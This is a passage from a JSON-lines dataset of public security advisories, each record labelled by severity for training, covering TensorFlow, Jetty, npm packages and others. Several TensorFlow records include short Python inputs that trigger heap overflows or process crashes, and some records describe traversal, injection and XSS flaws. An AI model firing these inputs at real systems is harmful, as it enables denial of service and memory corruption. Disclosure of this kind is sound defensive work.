information\nIf you have any questions or comments about this advisory:\n* Open an issue in [SocialiteProviders/Providers](https://github.com/SocialiteProviders/Providers)\n* Email us at [socialite@atymic.dev](mailto:socialite@atymic.dev)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-01-29", "split": "train"} -{"id": "d4dbad39fb2c72e80005", "text": "Heap out of bounds write in `RaggedBinCount`\n\n### Impact\nIf the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\ntf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\\\n size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\\\n binary_output=False)\n```\n\nThis will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L446):\n\n```cc \n for (int idx = 0; idx < num_values; ++idx) {\n while (idx >= splits(batch_idx)) {\n batch_idx++;\n }\n ...\n if (bin < size) {\n if (binary_output_) {\n out(batch_idx - 1, bin) = T(1);\n } else {\n T value = (weights_size > 0) ? weights(idx) : T(1);\n out(batch_idx - 1, bin) += value;\n }\n } \n }\n```\n\nBefore the `for` loop, `batch_idx` is set to 0. The attacker sets `splits(0)` to be 7, hence the `while` loop does not execute and `batch_idx` remains 0. This then results in writing to `out(-1, bin)`, which is before the heap allocated buffer for the output tensor.\n\n### Patches\nWe have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Heap out of bounds write in `RaggedBinCount`\n\n[Severity: LOW]\n\n### Impact\nIf the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\ntf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\\\n size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\\\n binary_output=False)\n```\n\nThis will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L446):\n \n```cc \n for (int idx = 0; idx < num_values; ++idx) {\n while (idx >= splits(batch_idx)) {\n batch_idx++;\n }\n ...\n if (bin < size) {\n if (binary_output_) {\n out(batch_idx - 1, bin) = T(1);\n } else {\n T value = (weights_size > 0) ? weights(idx) : T(1);\n out(batch_idx - 1, bin) += value;\n }\n } \n }\n```\n\nBefore the `for` loop, `batch_idx` is set to 0. The attacker sets `splits(0)` to be 7, hence the `while` loop does not execute and `batch_idx` remains 0. This then results in writing to `out(-1, bin)`, which is before the heap allocated buffer for the output tensor.\n\n### Patches\nWe have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "3a233ad32ab9f6d9e68f", "text": "Directory Traversal in hostr\n\nAffected versions of `hostr` are vulnerable to directory traversal which allows attackers to read files outside the current directory by sending `../` in the url path for GET requests.\n\n## Recommendation\n\nUpgrade to version 2.3.6 or later.", "text_raw": "Directory Traversal in hostr\n\n[Severity: HIGH]\n\nAffected versions of `hostr` are vulnerable to directory traversal which allows attackers to read files outside the current directory by sending `../` in the url path for GET requests.\n\n\n## Recommendation\n\nUpgrade to version 2.3.6 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-11-09", "split": "train"} -{"id": "7b6736d13de3bc6e4dcb", "text": "Overflow/crash in `tf.image.resize` when size is large\n\n### Impact\nIf `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow.\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\ntf.keras.layers.UpSampling2D(\n size=1610637938,\n data_format='channels_first',\n interpolation='bilinear')(np.ones((5,1,1,1)))\n```\n\nThe number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process.\n\n### Patches\nWe have patched the issue in GitHub commit [e5272d4204ff5b46136a1ef1204fc00597e21837](https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837) (merging [#51497](https://github.com/tensorflow/tensorflow/pull/51497)).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46914).", "text_raw": "Overflow/crash in `tf.image.resize` when size is large\n\n[Severity: MEDIUM]\n\n### Impact\nIf `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow.\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\ntf.keras.layers.UpSampling2D(\n size=1610637938,\n data_format='channels_first',\n interpolation='bilinear')(np.ones((5,1,1,1)))\n```\n\nThe number of elements in the output tensor is too much for the `int64_t` type and the overflow is detected via a `CHECK` statement. This aborts the process.\n\n### Patches\nWe have patched the issue in GitHub commit [e5272d4204ff5b46136a1ef1204fc00597e21837](https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837) (merging [#51497](https://github.com/tensorflow/tensorflow/pull/51497)).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46914).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "41a492c1546d2fbdf793", "text": "OS Command Injection in serial-number\n\nserial-number through 1.3.0 allows execution of arbritary commands. The "cmdPrefix" argument in serialNumber function is used by the "exec" function without any validation.", "text_raw": "OS Command Injection in serial-number\n\n[Severity: HIGH]\n\nserial-number through 1.3.0 allows execution of arbritary commands. The "cmdPrefix" argument in serialNumber function is used by the "exec" function without any validation.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "208fdc3e8987a6506800", "text": "Cross-Site Scripting in mrk.js\n\nVersions of `mrk.js` before 2.0.1 are vulnerable to cross-site scripting (XSS) when markdown is converted to HTML.\n\n## Recommendation\n\nUpdate to version 2.0.1 or later and use `mark.sanitizeURL()` for any `src` and `href` attributes when extending the markdown.", "text_raw": "Cross-Site Scripting in mrk.js\n\n[Severity: HIGH]\n\nVersions of `mrk.js` before 2.0.1 are vulnerable to cross-site scripting (XSS) when markdown is converted to HTML.\n\n\n## Recommendation\n\nUpdate to version 2.0.1 or later and use `mark.sanitizeURL()` for any `src` and `href` attributes when extending the markdown.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "dc014a3a0e39a228f28f", "text": "Practico 13.9 Multiple Vulnerabilities", "text_raw": "Practico 13.9 Multiple Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-11-03", "split": "train"} -{"id": "a02906d040232a879f11", "text": "org.apache.spark:spark-core_2.10 and org.apache.spark:spark-core_2.11 Improper Authentication vulnerability\n\nFrom version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future 2.4.x versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.", "text_raw": "org.apache.spark:spark-core_2.10 and org.apache.spark:spark-core_2.11 Improper Authentication vulnerability\n\n[Severity: MEDIUM]\n\nFrom version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future 2.4.x versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-11-09", "split": "train"} -{"id": "c5e689889c315fe5d1c9", "text": "DOS vulnerability for Quoted Quality CSV headers\n\n### Impact\nWhen Jetty handles a request containing request headers with a large number of “quality” (i.e. q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application.\n\nThe only features within Jetty that can trigger this behavior are:\n\n- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc)\n- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc)\n- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call.\n- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header.\n- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app)\n\n### Versions\n`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531.\n\nCurrently, known vulnerable versions include:\n\n- 9.4.6.v20170531 thru to 9.4.36.v20210114\n- 10.0.0\n- 11.0.0\n\n### Workarounds\n\nQuality ordered values are used infrequently by jetty so they can be avoided by:\n\n* Do not use the default error page/handler.\n * Do not deploy the `StatisticsServlet` exposed to the network\n * Do not call `getLocale` API\n * Do not enable precompressed static content in the `DefaultServlet`\n\n### Patches\n\nAll patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php)\n- 9.4.37.v20210219 and greater\n- 10.0.1 and greater \n- 11.0.1 and greater", "text_raw": "DOS vulnerability for Quoted Quality CSV headers\n\n[Severity: MEDIUM]\n\n### Impact\nWhen Jetty handles a request containing request headers with a large number of “quality” (i.e. q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application.\n\nThe only features within Jetty that can trigger this behavior are:\n\n- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc)\n- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc)\n- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call.\n- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header.\n- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app)\n\n### Versions\n`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531. \n\nCurrently, known vulnerable versions include:\n\n- 9.4.6.v20170531 thru to 9.4.36.v20210114\n- 10.0.0\n- 11.0.0\n\n### Workarounds\n\nQuality ordered values are used infrequently by jetty so they can be avoided by:\n\n * Do not use the default error page/handler.\n * Do not deploy the `StatisticsServlet` exposed to the network\n * Do not call `getLocale` API\n * Do not enable precompressed static content in the `DefaultServlet` \n\n### Patches\n\nAll patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php)\n- 9.4.37.v20210219 and greater\n- 10.0.1 and greater \n- 11.0.1 and greater", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-10", "split": "train"} -{"id": "5c11cdde1f90a41dfbe9", "text": "SQL Injection in topthink/thinkphp\n\nThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the \"where\" and \"query\" methods.", "text_raw": "SQL Injection in topthink/thinkphp\n\n[Severity: CRITICAL]\n\nThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the \"where\" and \"query\" methods.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-09-30", "split": "train"} -{"id": "e618b8de9c4ea9691bab", "text": "Exposure of Sensitive Information to an Unauthorized Actor in ansible\n\nA flaw was discovered in the way Ansible templating was implemented in versions before 2.6.18, 2.7.12 and 2.8.2, causing the possibility of information disclosure through unexpected variable substitution. By taking advantage of unintended variable substitution the content of any variable may be disclosed.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in ansible\n\n[Severity: MEDIUM]\n\nA flaw was discovered in the way Ansible templating was implemented in versions before 2.6.18, 2.7.12 and 2.8.2, causing the possibility of information disclosure through unexpected variable substitution. By taking advantage of unintended variable substitution the content of any variable may be disclosed.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-07-31", "split": "train"} -{"id": "4bc926aa5a932277fbcf", "text": "Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities", "text_raw": "Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2015-04-07", "split": "train"} -{"id": "7b922be15a458b196db9", "text": "Downloads Resources over HTTP in macaca-chromedriver-zxa\n\nAffected versions of `macaca-chromedriver-zxa` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `macaca-chromedriver-zxa`.\n\n## Recommendation\n\nThe best mitigation is to manually set the download URL to a safe HTTPS server via the `CHROMEDRIVER_CDNURL` environment variable.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in macaca-chromedriver-zxa\n\n[Severity: HIGH]\n\nAffected versions of `macaca-chromedriver-zxa` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `macaca-chromedriver-zxa`.\n\n\n## Recommendation\n\nThe best mitigation is to manually set the download URL to a safe HTTPS server via the `CHROMEDRIVER_CDNURL` environment variable.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "7a68152125395e964714", "text": "showdoc is vulnerable to URL Redirection to Untrusted Site\n\nshowdoc is vulnerable to URL Redirection to Untrusted Site.", "text_raw": "showdoc is vulnerable to URL Redirection to Untrusted Site\n\n[Severity: MEDIUM]\n\nshowdoc is vulnerable to URL Redirection to Untrusted Site.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-03", "split": "train"} -{"id": "48c3e05b32fca09108a8", "text": "Path Traversal in browserless-chrome\n\nThis affects all versions of browserless-chrome before 1.43.0. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server.", "text_raw": "Path Traversal in browserless-chrome\n\n[Severity: HIGH]\n\nThis affects all versions of browserless-chrome before 1.43.0. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "25005e3d64ef6bc3ebbe", "text": "Content Injection in remarkable\n\nVersions 1.4.0 and earlier of `remarkable` are affected by a cross-site scripting vulnerability. This occurs because vulnerable versions of `remarkable` did not properly whitelist link protocols, and consequently allowed `javascript:` to be used.\n\n### Proof of Concept\n\nMarkdown Source:\n```\n[link]()\n```\n\nRendered HTML:\n```\nlink\n```\n\n## Recommendation\n\nUpdate to version 1.4.1 or later", "text_raw": "Content Injection in remarkable\n\n[Severity: HIGH]\n\nVersions 1.4.0 and earlier of `remarkable` are affected by a cross-site scripting vulnerability. This occurs because vulnerable versions of `remarkable` did not properly whitelist link protocols, and consequently allowed `javascript:` to be used. \n\n\n### Proof of Concept\n\nMarkdown Source:\n```\n[link]()\n```\n\nRendered HTML:\n```\nlink\n```\n\n\n## Recommendation\n\nUpdate to version 1.4.1 or later", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-08-31", "split": "train"} -{"id": "a6c47322b0248a38b2da", "text": "Use after free in generic-array\n\nAn issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.", "text_raw": "Use after free in generic-array\n\n[Severity: HIGH]\n\nAn issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "9bd6220151d3f38ddf8e", "text": "Command injection in bestzip\n\nThe package bestzip before 2.1.7 are vulnerable to Command Injection via the options param.", "text_raw": "Command injection in bestzip\n\n[Severity: CRITICAL]\n\nThe package bestzip before 2.1.7 are vulnerable to Command Injection via the options param.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "ff954479ab8e451507e2", "text": "Android Kernel Out-of-Bounds Write Vulnerability\n\nAffected: Android Android Kernel\n\nAndroid Kernel binder_transaction of binder.c contains an out-of-bounds write vulnerability due to an incorrect bounds check that could allow for local privilege escalation. This vulnerability was observed chained with CVE-2019-2215 and CVE-2020-0069 under exploit chain \"AbstractEmu.\"\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Android Kernel Out-of-Bounds Write Vulnerability\n\nAffected: Android Android Kernel\n\nAndroid Kernel binder_transaction of binder.c contains an out-of-bounds write vulnerability due to an incorrect bounds check that could allow for local privilege escalation. This vulnerability was observed chained with CVE-2019-2215 and CVE-2020-0069 under exploit chain \"AbstractEmu.\"\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "81510f2201e1d6e2a299", "text": "ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions", "text_raw": "ZKTeco ZKTime.Net 3.0.1.6 Insecure File Permissions\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2016-08-30", "split": "train"} -{"id": "72f590994c0be9bad346", "text": "Misinterpretation of malicious XML input\n\n### Impact\nxmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.\n\n### Patches\nUpdate to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`)\n\nSee issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved.\n\n### Workarounds\n\nDownstream applications can validate the input and reject the maliciously crafted documents.\n\n### References\n\nSimilar to this one reported on the Go standard library:\n\n- https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/\n- https://mattermost.com/blog/securing-xml-implementations-across-the-web/\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom)\n* Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom`", "text_raw": "Misinterpretation of malicious XML input\n\n[Severity: MEDIUM]\n\n### Impact\nxmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.\n\n### Patches\nUpdate to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`)\n\nSee issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved.\n\n### Workarounds\n\nDownstream applications can validate the input and reject the maliciously crafted documents.\n\n### References\n\nSimilar to this one reported on the Go standard library:\n\n- https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/\n- https://mattermost.com/blog/securing-xml-implementations-across-the-web/\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom)\n* Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom`\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-03", "split": "train"} -{"id": "8e7fe4dce71a8ba4efad", "text": "Code Injection in mosc\n\nmosc through 1.0.0 is vulnerable to Arbitrary Code Execution. User input provided to `properties` argument is executed by the `eval` function, resulting in code execution.", "text_raw": "Code Injection in mosc\n\n[Severity: HIGH]\n\nmosc through 1.0.0 is vulnerable to Arbitrary Code Execution. User input provided to `properties` argument is executed by the `eval` function, resulting in code execution.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-17", "split": "train"} -{"id": "0425c6d39ca33a82ba3d", "text": "rails-html-sanitizer Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in the rails-html-sanitizer gem before 1.0.3 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via crafted tag attributes.", "text_raw": "rails-html-sanitizer Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in the rails-html-sanitizer gem before 1.0.3 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via crafted tag attributes.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "0eb26f281fe9def3444c", "text": "Buffer Overflow in Apache Mina SSHD\n\nA vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0", "text_raw": "Buffer Overflow in Apache Mina SSHD\n\n[Severity: HIGH]\n\nA vulnerability in sshd-core of Apache Mina SSHD allows an attacker to overflow the server causing an OutOfMemory error. This issue affects the SFTP and port forwarding features of Apache Mina SSHD version 2.0.0 and later versions. It was addressed in Apache Mina SSHD 2.7.0", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-02", "split": "train"} -{"id": "e256c71e4c6b8acfc46b", "text": "Reference binding to nullptr in unicode encoding\n\n### Impact\nAn attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`:\n\n```python\nimport tensorflow as tf\nfrom tensorflow.python.ops import gen_string_ops\n\ngen_string_ops.unicode_encode(\n input_values=[],\n input_splits=[],\n output_encoding='UTF-8',\n errors='ignore',\n replacement_char='a')\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty:\n\n```cc\n const Tensor& input_splits = context->input(1);\n const auto input_splits_flat = input_splits.flat();\n TensorShape output_shape({input_splits.dim_size(0) - 1});\n```\n\n### Patches\nWe have patched the issue in GitHub commit [2e0ee46f1a47675152d3d865797a18358881d7a6](https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Reference binding to nullptr in unicode encoding\n\n[Severity: HIGH]\n\n### Impact\nAn attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`:\n\n```python\nimport tensorflow as tf\nfrom tensorflow.python.ops import gen_string_ops\n\ngen_string_ops.unicode_encode(\n input_values=[],\n input_splits=[],\n output_encoding='UTF-8',\n errors='ignore',\n replacement_char='a')\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty: \n\n```cc\n const Tensor& input_splits = context->input(1);\n const auto input_splits_flat = input_splits.flat();\n TensorShape output_shape({input_splits.dim_size(0) - 1});\n```\n\n### Patches\nWe have patched the issue in GitHub commit [2e0ee46f1a47675152d3d865797a18358881d7a6](https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "40a96c7db080737c65b1", "text": "STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)", "text_raw": "STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2021-01-26", "split": "train"} -{"id": "d439d7a3f9fd874ee5d9", "text": "Malicious Package in bpi66\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bpi66\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "d2b9d1dbf9f2eceb1cde", "text": "Apache Camel's XSLT component allows remote attackers to execute arbitrary Java methods\n\nThe XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.", "text_raw": "Apache Camel's XSLT component allows remote attackers to execute arbitrary Java methods\n\n[Severity: HIGH]\n\nThe XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.", "severity": "high", "severity_label": 2, "source": 